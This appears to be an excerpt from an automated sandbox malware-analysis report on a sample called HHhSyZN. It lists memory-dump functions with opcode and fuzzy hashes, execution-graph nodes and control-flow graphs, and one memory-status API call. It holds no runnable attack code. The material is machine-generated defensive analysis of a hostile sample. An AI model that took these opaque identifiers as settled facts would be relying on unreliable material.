                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_154d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce0b509f39addccd272d6c206c95ebcb4bff82ef4e97d4e96a9f543cb2d23bfd
                                                                                                                • Instruction ID: 819987d0dcdd664bf574aca0e9d0eb16479ab9b53ee855b2e890dd77a992bd97
                                                                                                                • Opcode Fuzzy Hash: ce0b509f39addccd272d6c206c95ebcb4bff82ef4e97d4e96a9f543cb2d23bfd
                                                                                                                • Instruction Fuzzy Hash: 48212971608200DFDB05DF98D5C4B2ABBB5FB94328F20CA6DE9094F356C33AD446CA61
                                                                                                                Function 0154D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767958065.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_154d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d0f2850e61a50ea372a3ac79294fdf88b8fb16212374e44257e4924d7a3ea871
                                                                                                                • Instruction ID: 59779d206ab0971944b5c1cb7bd2520f71584f18c70210f72784e0c0c5705694
                                                                                                                • Opcode Fuzzy Hash: d0f2850e61a50ea372a3ac79294fdf88b8fb16212374e44257e4924d7a3ea871
                                                                                                                • Instruction Fuzzy Hash: A1210071604200DFCB15DF98D984B2ABBB5FB94318F20C96DD80E4F256D33AD446CA61
                                                                                                                Function 0ADA1480 Relevance: .1, Instructions: 66COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7bc14685942ae4fd0f194e5132f81f0c8f0e80c03ed38c414369b4cb430532d3
                                                                                                                • Instruction ID: a00f8aa60d37b9ae34d41276af394f95823d11f5b9039c42a40339c76efea59b
                                                                                                                • Opcode Fuzzy Hash: 7bc14685942ae4fd0f194e5132f81f0c8f0e80c03ed38c414369b4cb430532d3
                                                                                                                • Instruction Fuzzy Hash: 42213B75200A009FC364DF2CD684A56BBF5FF89610B06466AE55AC7BA1DB30FC54CF61
                                                                                                                Function 0154D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767958065.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_154d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 41e84cba84804d9039f37e384489e195bc9fc5d6162cef47cdb92d73bc79016e
                                                                                                                • Instruction ID: 3966d27414dbdae97ce26815676e8fce2a3aa6fd06d7803ba2653a8bd4bc0cbe
                                                                                                                • Opcode Fuzzy Hash: 41e84cba84804d9039f37e384489e195bc9fc5d6162cef47cdb92d73bc79016e
                                                                                                                • Instruction Fuzzy Hash: 602192755093808FDB13CF64D994715BF71FB46218F28C5DAD8498F2A7C33A980ACB62
                                                                                                                Function 0ADA138F Relevance: .1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f6cee5dd401d8334a4385e907032fb45ae58c4f152d9518f2ac2fa7caadbdc6a
                                                                                                                • Instruction ID: 81e5f6f3b9d6a72d3baeec084f2edb586f56a1d1abb8aadd08fe1a3a553fa460
                                                                                                                • Opcode Fuzzy Hash: f6cee5dd401d8334a4385e907032fb45ae58c4f152d9518f2ac2fa7caadbdc6a
                                                                                                                • Instruction Fuzzy Hash: 40119A70E012068FDB14DF68C444AAFFBF1AF48300F16C1A9D418AB361D7359802CB90
                                                                                                                Function 0ADA0970 Relevance: .1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d15c82448072fd46a48aa4d6da224eef4e33d812fd9f07261c92d5708de7b707
                                                                                                                • Instruction ID: c84ab0ba7e8ab7204accac74f461b9203604b32fd00ad1866029121e9062efdd
                                                                                                                • Opcode Fuzzy Hash: d15c82448072fd46a48aa4d6da224eef4e33d812fd9f07261c92d5708de7b707
                                                                                                                • Instruction Fuzzy Hash: 43110370E0120A8FCB18DFA9C444AAEF7F1AF48310F1A85A9E458AB361D7359901CB91
                                                                                                                Function 0153D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767912181.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_153d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction ID: d818764784b7e1bfea52938df09c503264e41fca0dd264b50c801e5963e10a62
                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction Fuzzy Hash: 5D11E172504280CFCB02CF54D5C4B1ABF71FB84318F24C6A9D8090F256C33AD45ACBA1
                                                                                                                Function 0154D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767958065.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_154d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction ID: 1527725194f10179417fb46697a4f9e9a3d8838f26f5ab6c6f1a2dc85f0c0646
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: 7811BB75508280DFDB02CF54C5C4B19BFB1FB84228F24C6AAD8494F296C33AD40ACB61
                                                                                                                Function 0153D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767912181.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_153d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f6e95aa446ed086927c1cbd274816e6074c63885e02929a5fbbe8ec255b5d1cd
                                                                                                                • Instruction ID: 5ccd1cd5b7955436eea02cff9d8cb268069480134eab7da42e36ada664af1682
                                                                                                                • Opcode Fuzzy Hash: f6e95aa446ed086927c1cbd274816e6074c63885e02929a5fbbe8ec255b5d1cd
                                                                                                                • Instruction Fuzzy Hash: 92012B310083809AE7124E69CD84B6BBFF8FF81364F48C92AED594F286C639D840C671
                                                                                                                Function 0153D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767912181.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_153d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1a7a700fc7a6c4830fa10434968876edda5e123ecae28375fbf4ab17142f0705
                                                                                                                • Instruction ID: 533e800f10667a3fc7e1fc3b7eb4347e0f72b088a004d1171a5aa9f7e718df1b
                                                                                                                • Opcode Fuzzy Hash: 1a7a700fc7a6c4830fa10434968876edda5e123ecae28375fbf4ab17142f0705
                                                                                                                • Instruction Fuzzy Hash: 4CF06271404384AAEB118E1AC988B66FFB8FB81634F18C45AED484F286C2799844CAB1
                                                                                                                Function 0ADA133F Relevance: .0, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a974348897fe56863d94f9775767d25e200ff1841d54ad0ef59d1281e44841a0
                                                                                                                • Instruction ID: 7d11cb7608bcba1849a335ead79a71a20f18291f763d260893c8fd21fa11b557
                                                                                                                • Opcode Fuzzy Hash: a974348897fe56863d94f9775767d25e200ff1841d54ad0ef59d1281e44841a0
                                                                                                                • Instruction Fuzzy Hash: 9BE0DFB5C00309AED741EFBA98013EFBFF1EB04600F018A66D090E7601DB7542018FA2
                                                                                                                Function 0ADA1350 Relevance: .0, Instructions: 16COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0ed590b02c0581c4631052008b1e9a3abd38bdd9a839a5934040341b9cef792f
                                                                                                                • Instruction ID: 291a789b71ce3198714ef9afdf612220ef0b457292e1f4ec2a79bfbdcd839913
                                                                                                                • Opcode Fuzzy Hash: 0ed590b02c0581c4631052008b1e9a3abd38bdd9a839a5934040341b9cef792f
                                                                                                                • Instruction Fuzzy Hash: 3FD017B0C0030AEEDB40EFB988013AFBBF1AB04300F118A6AC054E2201EBB486048F91

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:7.5%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:39
                                                                                                                Total number of Limit Nodes:6
                                                                                                                execution_graph 38367 150fef8 38368 150ff20 38367->38368 38369 150ff90 38368->38369 38371 6caff2b 38368->38371 38373 6caff42 38371->38373 38374 6cafd09 38371->38374 38372 6cafd66 38372->38369 38373->38369 38374->38372 38378 150e708 38374->38378 38381 150e6f8 38374->38381 38375 6cafe3f 38375->38369 38384 150eb30 38378->38384 38379 150e716 38379->38375 38382 150e716 38381->38382 38383 150eb30 GlobalMemoryStatusEx 38381->38383 38382->38375 38383->38382 38385 150eb4d 38384->38385 38388 150eb75 38384->38388 38385->38379 38386 150eb96 38386->38379 38387 150ebfb 38387->38379 38388->38386 38388->38387 38389 150ec5e GlobalMemoryStatusEx 38388->38389 38390 150ec8e 38389->38390 38390->38379 38391 1500848 38393 150084e 38391->38393 38392 150091b 38393->38392 38395 1501380 38393->38395 38396 1501396 38395->38396 38397 1501484 38396->38397 38399 1507ea8 38396->38399 38397->38393 38400 1507eb2 38399->38400 38401 1507ecc 38400->38401 38404 6cafa98 38400->38404 38409 6cafa93 38400->38409 38401->38396 38406 6cafaad 38404->38406 38405 6cafcc2 38405->38401 38406->38405 38407 6caff2b GlobalMemoryStatusEx 38406->38407 38408 6cafcd9 GlobalMemoryStatusEx 38406->38408 38407->38406 38408->38406 38410 6cafaad 38409->38410 38411 6cafcc2 38410->38411 38412 6caff2b GlobalMemoryStatusEx 38410->38412 38413 6cafcd9 GlobalMemoryStatusEx 38410->38413 38411->38401 38412->38410 38413->38410

                                                                                                                Executed Functions

                                                                                                                Function 06CA30E0 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 6ca30e0-6ca3101 1 6ca3103-6ca3106 0->1 2 6ca3108-6ca3127 1->2 3 6ca312c-6ca312f 1->3 2->3 4 6ca38d0-6ca38d2 3->4 5 6ca3135-6ca3154 3->5 7 6ca38d9-6ca38dc 4->7 8 6ca38d4 4->8 13 6ca316d-6ca3177 5->13 14 6ca3156-6ca3159 5->14 7->1 10 6ca38e2-6ca38eb 7->10 8->7 18 6ca317d-6ca318c 13->18 14->13 15 6ca315b-6ca316b 14->15 15->18 126 6ca318e call 6ca38f8 18->126 127 6ca318e call 6ca3900 18->127 19 6ca3193-6ca3198 20 6ca319a-6ca31a0 19->20 21 6ca31a5-6ca3482 19->21 20->10 42 6ca3488-6ca3537 21->42 43 6ca38c2-6ca38cf 21->43 52 6ca3539-6ca355e 42->52 53 6ca3560 42->53 55 6ca3569-6ca357c 52->55 53->55 57 6ca38a9-6ca38b5 55->57 58 6ca3582-6ca35a4 55->58 57->42 59 6ca38bb 57->59 58->57 61 6ca35aa-6ca35b4 58->61 59->43 61->57 62 6ca35ba-6ca35c5 61->62 62->57 63 6ca35cb-6ca36a1 62->63 75 6ca36af-6ca36df 63->75 76 6ca36a3-6ca36a5 63->76 80 6ca36ed-6ca36f9 75->80 81 6ca36e1-6ca36e3 75->81 76->75 82 6ca36fb-6ca36ff 80->82 83 6ca3759-6ca375d 80->83 81->80 82->83 84 6ca3701-6ca372b 82->84 85 6ca389a-6ca38a3 83->85 86 6ca3763-6ca379f 83->86 93 6ca3739-6ca3756 84->93 94 6ca372d-6ca372f 84->94 85->57 85->63 96 6ca37ad-6ca37bb 86->96 97 6ca37a1-6ca37a3 86->97 93->83 94->93 100 6ca37bd-6ca37c8 96->100 101 6ca37d2-6ca37dd 96->101 97->96 100->101 106 6ca37ca 100->106 104 6ca37df-6ca37e5 101->104 105 6ca37f5-6ca3806 101->105 107 6ca37e9-6ca37eb 104->107 108 6ca37e7 104->108 110 6ca3808-6ca380e 105->110 111 6ca381e-6ca382a 105->111 106->101 107->105 108->105 112 6ca3812-6ca3814 110->112 113 6ca3810 110->113 115 6ca382c-6ca3832 111->115 116 6ca3842-6ca3893 111->116 112->111 113->111 117 6ca3836-6ca3838 115->117 118 6ca3834 115->118 116->85 117->116 118->116 126->19 127->19
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
                                                                                                                • Opcode ID: 21b159555bae137995d1f36b4959fbb82c9a090faaef5bfaf88ce3b34fea3f7e
                                                                                                                • Instruction ID: 282681d01954ea5c1db969ee9d77b5959e97e72eb34c04f412e48f6229eed60a
                                                                                                                • Opcode Fuzzy Hash: 21b159555bae137995d1f36b4959fbb82c9a090faaef5bfaf88ce3b34fea3f7e
                                                                                                                • Instruction Fuzzy Hash: 2E323031E1075A8FDB14DF75C85459DB7B6FFC9304F1086AAD409AB264EB30AD85CB81
                                                                                                                Function 06CAB488 Relevance: .6, Instructions: 554COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 26d28c3d84b97e1421b1a8523ce70d6661fda4fe16f437a84b13063182e2304d
                                                                                                                • Instruction ID: 973f995a55210cc880a1c6c1429dc7efe99ba6228d5117b529dc460768db0fec
                                                                                                                • Opcode Fuzzy Hash: 26d28c3d84b97e1421b1a8523ce70d6661fda4fe16f437a84b13063182e2304d
                                                                                                                • Instruction Fuzzy Hash: 42126E30E1030A8FEF64CF68C5947ADB7B6EB49314F24882AE409EB395DA35DD81CB51
                                                                                                                Function 06CA91A0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 128 6ca91a0-6ca91c5 129 6ca91c7-6ca91ca 128->129 130 6ca91cc-6ca91eb 129->130 131 6ca91f0-6ca91f3 129->131 130->131 132 6ca91f9-6ca920e 131->132 133 6ca9ab3-6ca9ab5 131->133 139 6ca9210-6ca9216 132->139 140 6ca9226-6ca923c 132->140 135 6ca9abc-6ca9abf 133->135 136 6ca9ab7 133->136 135->129 138 6ca9ac5-6ca9acf 135->138 136->135 142 6ca921a-6ca921c 139->142 143 6ca9218 139->143 145 6ca9247-6ca9249 140->145 142->140 143->140 146 6ca924b-6ca9251 145->146 147 6ca9261-6ca92d2 145->147 148 6ca9253 146->148 149 6ca9255-6ca9257 146->149 158 6ca92fe-6ca931a 147->158 159 6ca92d4-6ca92f7 147->159 148->147 149->147 164 6ca931c-6ca933f 158->164 165 6ca9346-6ca9361 158->165 159->158 164->165 170 6ca938c-6ca93a7 165->170 171 6ca9363-6ca9385 165->171 176 6ca93a9-6ca93cb 170->176 177 6ca93d2-6ca93dc 170->177 171->170 176->177 178 6ca93de-6ca93e7 177->178 179 6ca93ec-6ca9466 177->179 178->138 185 6ca9468-6ca9486 179->185 186 6ca94b3-6ca94c8 179->186 190 6ca9488-6ca9497 185->190 191 6ca94a2-6ca94b1 185->191 186->133 190->191 191->185 191->186
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 9ea9b83f3f5fc5655bea833d98a9bcc1e6841fd647649941b8c04815ef3a3b63
                                                                                                                • Instruction ID: 6da034e5fcade0de59511ac0cf84f89073832d046c634a4502cb0662b2fd8a2b
                                                                                                                • Opcode Fuzzy Hash: 9ea9b83f3f5fc5655bea833d98a9bcc1e6841fd647649941b8c04815ef3a3b63
                                                                                                                • Instruction Fuzzy Hash: 54917F31B1020A9FDB54DF69D8507AEB7F6EBC9204F10856AC409EB344EA34DD868B91
                                                                                                                Function 06CA4BF0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 194 6ca4bf0-6ca4c14 195 6ca4c16-6ca4c19 194->195 196 6ca52f8-6ca52fb 195->196 197 6ca4c1f-6ca4d17 195->197 198 6ca531c-6ca531e 196->198 199 6ca52fd-6ca5317 196->199 217 6ca4d9a-6ca4da1 197->217 218 6ca4d1d-6ca4d65 197->218 201 6ca5320 198->201 202 6ca5325-6ca5328 198->202 199->198 201->202 202->195 204 6ca532e-6ca533b 202->204 219 6ca4da7-6ca4e17 217->219 220 6ca4e25-6ca4e2e 217->220 240 6ca4d6a call 6ca54a8 218->240 241 6ca4d6a call 6ca54a1 218->241 237 6ca4e19 219->237 238 6ca4e22 219->238 220->204 231 6ca4d70-6ca4d8c 234 6ca4d8e 231->234 235 6ca4d97-6ca4d98 231->235 234->235 235->217 237->238 238->220 240->231 241->231
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$XPcq$\Ocq
                                                                                                                • API String ID: 0-3575482020
                                                                                                                • Opcode ID: 84a4f7d5724c07b568df1e90e489b5ea269402e79a857ae243419d3b11189e6a
                                                                                                                • Instruction ID: 00a9ebb327c04735be13a0da3908368162783228e21dd31e0e25266c736a5897
                                                                                                                • Opcode Fuzzy Hash: 84a4f7d5724c07b568df1e90e489b5ea269402e79a857ae243419d3b11189e6a
                                                                                                                • Instruction Fuzzy Hash: 53619E70E002199FEF549FA9C8547AEBBF6FB88704F20842ED105EB394DE758C428B91
                                                                                                                Function 06CA80EC Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1000 6ca80ec-6ca8106 1001 6ca8111-6ca8113 1000->1001 1002 6ca812b-6ca8132 1001->1002 1003 6ca8115-6ca811b 1001->1003 1004 6ca8143 1002->1004 1005 6ca8134-6ca8141 1002->1005 1006 6ca811f-6ca8121 1003->1006 1007 6ca811d 1003->1007 1008 6ca8148-6ca814a 1004->1008 1005->1008 1006->1002 1007->1002 1009 6ca814c-6ca814f 1008->1009 1010 6ca8161-6ca819a 1008->1010 1011 6ca840e-6ca8417 1009->1011 1016 6ca819c-6ca81a6 1010->1016 1017 6ca81b0-6ca81bf 1010->1017 1019 6ca81de-6ca8219 1017->1019 1020 6ca81c1-6ca81dc 1017->1020 1023 6ca83aa-6ca83c0 1019->1023 1024 6ca821f-6ca8230 1019->1024 1020->1019 1023->1011 1029 6ca8236-6ca8253 1024->1029 1030 6ca8395-6ca83a4 1024->1030 1029->1030 1034 6ca8259-6ca834f call 6ca65f8 1029->1034 1030->1023 1030->1024 1058 6ca835d 1034->1058 1059 6ca8351-6ca835b 1034->1059 1060 6ca8362-6ca8364 1058->1060 1059->1060 1060->1030 1061 6ca8366-6ca836b 1060->1061 1062 6ca8379 1061->1062 1063 6ca836d-6ca8377 1061->1063 1064 6ca837e-6ca8380 1062->1064 1063->1064 1064->1030 1065 6ca8382-6ca838e 1064->1065 1065->1030
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: f20df2afa4586825314db8dda38f5878b040499085a33ba047a9093f480bf895
                                                                                                                • Instruction ID: fd601a99daec6fd0f432886c44a6fe7afcdd56e106c742e45d15a96292bdf27c
                                                                                                                • Opcode Fuzzy Hash: f20df2afa4586825314db8dda38f5878b040499085a33ba047a9093f480bf895
                                                                                                                • Instruction Fuzzy Hash: AA71AF31B023068FDB58DF75D49466EB7E6EF84208F148569D40ADB398EB34DD46CB81
                                                                                                                Function 06CA9193 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1163 6ca9193-6ca91c5 1164 6ca91c7-6ca91ca 1163->1164 1165 6ca91cc-6ca91eb 1164->1165 1166 6ca91f0-6ca91f3 1164->1166 1165->1166 1167 6ca91f9-6ca920e 1166->1167 1168 6ca9ab3-6ca9ab5 1166->1168 1174 6ca9210-6ca9216 1167->1174 1175 6ca9226-6ca923c 1167->1175 1170 6ca9abc-6ca9abf 1168->1170 1171 6ca9ab7 1168->1171 1170->1164 1173 6ca9ac5-6ca9acf 1170->1173 1171->1170 1177 6ca921a-6ca921c 1174->1177 1178 6ca9218 1174->1178 1180 6ca9247-6ca9249 1175->1180 1177->1175 1178->1175 1181 6ca924b-6ca9251 1180->1181 1182 6ca9261-6ca92d2 1180->1182 1183 6ca9253 1181->1183 1184 6ca9255-6ca9257 1181->1184 1193 6ca92fe-6ca931a 1182->1193 1194 6ca92d4-6ca92f7 1182->1194 1183->1182 1184->1182 1199 6ca931c-6ca933f 1193->1199 1200 6ca9346-6ca9361 1193->1200 1194->1193 1199->1200 1205 6ca938c-6ca93a7 1200->1205 1206 6ca9363-6ca9385 1200->1206 1211 6ca93a9-6ca93cb 1205->1211 1212 6ca93d2-6ca93dc 1205->1212 1206->1205 1211->1212 1213 6ca93de-6ca93e7 1212->1213 1214 6ca93ec-6ca9466 1212->1214 1213->1173 1220 6ca9468-6ca9486 1214->1220 1221 6ca94b3-6ca94c8 1214->1221 1225 6ca9488-6ca9497 1220->1225 1226 6ca94a2-6ca94b1 1220->1226 1221->1168 1225->1226 1226->1220 1226->1221
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: ab7d1fc02b51d942b4c672287bf6dec47391d6e6655ade24fab03c7e8640835a
                                                                                                                • Instruction ID: e385551dff7627e3843c1948b31c76c7a70962345895a64cbdf030debc2789e0
                                                                                                                • Opcode Fuzzy Hash: ab7d1fc02b51d942b4c672287bf6dec47391d6e6655ade24fab03c7e8640835a
                                                                                                                • Instruction Fuzzy Hash: A0519331B102069FDB54DF79D990B6FB7FAEBC8204F10842AD409EB354EA34DD428B91
                                                                                                                Function 0150EB30 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1292 150eb30-150eb4b 1293 150eb75-150eb94 call 150e730 1292->1293 1294 150eb4d-150eb74 1292->1294 1299 150eb96-150eb99 1293->1299 1300 150eb9a-150ebf9 1293->1300 1307 150ebfb-150ebfe 1300->1307 1308 150ebff-150ec8c GlobalMemoryStatusEx 1300->1308 1311 150ec95-150ecbd 1308->1311 1312 150ec8e-150ec94 1308->1312 1312->1311
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149511246.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_1500000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 661bd13b05b69b6f7b6b0fb879f559ec2748f293e3e729bcdbec8618ba1bd5a1
                                                                                                                • Instruction ID: 0d81c434671b73feda809cfe3c2439475a78627f8aa07d0bd46d3d70ceca81ab
                                                                                                                • Opcode Fuzzy Hash: 661bd13b05b69b6f7b6b0fb879f559ec2748f293e3e729bcdbec8618ba1bd5a1
                                                                                                                • Instruction Fuzzy Hash: 3E413372D003998FCB04DFB9D4446AEBFF1FF89210F15896AD508AB290EB349845CBA0
                                                                                                                Function 0150EC18 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
